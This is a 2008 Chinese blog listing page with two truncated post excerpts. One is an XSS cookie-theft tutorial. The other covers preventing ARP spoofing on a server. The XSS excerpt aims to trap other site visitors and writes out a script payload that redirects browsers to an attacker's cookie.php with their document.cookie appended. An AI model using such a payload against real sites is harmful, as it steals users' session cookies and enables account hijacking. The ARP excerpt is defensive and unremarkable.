popphen.net.ru
  • 1 
预览模式: 普通 | 列表

XSS攻击Cookie欺骗中隐藏JavaScript执行

作者:天晴无名氏 日期:2008-04-02 12:30

比如发现一处可XSS地方:<script>alert(不管怎么样弹出就好)</script> 

自己弄个偷cookie的文件。

目的是让其他浏览者去浏览我们设计好的陷阱

<script>document.location='http://URL.com/cookie.php?cookie=&#39;+escape(document.co

[阅读全文]

类别: Articles | 引用: 0 | 评论: 0 | 阅读: 169

使用Lns杜绝Arp欺骗

作者:天晴无名氏 日期:2008-03-24 00:08



对于服务器来说,Arp欺骗是一种很烦人的攻击

为了便于说明,我们先假设一个子网环境:

网关 : IP = IP-1, MAC = 11:11:11:11:11:11

本机 : IP = IP-2, MAC = 22:22:22:22:22:22

主机A: IP = IP-A, MAC = AA:AA:AA:AA:AA:AA

主机B: IP = IP-B, MAC = BB:BB:BB:BB:BB

[阅读全文]

标签: Lns 杜绝 Arp 欺骗
类别: Articles | 引用: 0 | 评论: 0 | 阅读: 221
  • 1